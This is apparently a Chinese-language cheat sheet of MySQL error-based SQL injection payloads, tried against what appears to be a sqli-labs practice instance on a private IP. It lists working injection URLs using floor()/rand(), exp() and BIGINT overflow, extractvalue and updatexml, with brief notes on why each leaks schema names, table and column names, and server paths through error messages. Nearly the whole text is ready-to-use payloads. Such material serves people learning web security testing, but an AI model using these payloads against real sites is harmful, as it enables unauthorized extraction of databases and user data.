目录
通过floor()报错
?id=1 and (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))
?id=1 and (select count(*) from information_schema.tables group by concat((select concat(schema_name) from information_schema.schemata limit 0,1),floor(rand(0)*2)))
payload: 修改select查询来报错注入获取
报错注入之 exp()
~0 :对0逐位取反是一个很大的值
exp(xxx):当xxx大于709时就会报错
函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值
所以,只要 exp(~(构造能成功执行的搜索语句))
这时,就会报错,但是exp() 报错时会将其中的语句也一块执行输出
http://192.168.129.191:8001/Less-5/?id=1' and exp(~(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x))--+
http://192.168.129.191:8001/Less-5/?id=1' and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')x))--+
报错注入之 BIGINT溢出错误
http://192.168.129.191:8001/Less-5/?id=1' and !(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')x)-~0 --+
用搜索结果去 减 ~0 ,就会产生溢出错误,从而报错执行打印出想要的结果
报错注入之 extractvalue
http://192.168.129.191:8001/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
http://192.168.129.191:8001/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))--+
报错注入之 updatexml
http://192.168.129.191:8001/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@datadir),0x7e),1)--+
http://192.168.129.191:8001/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+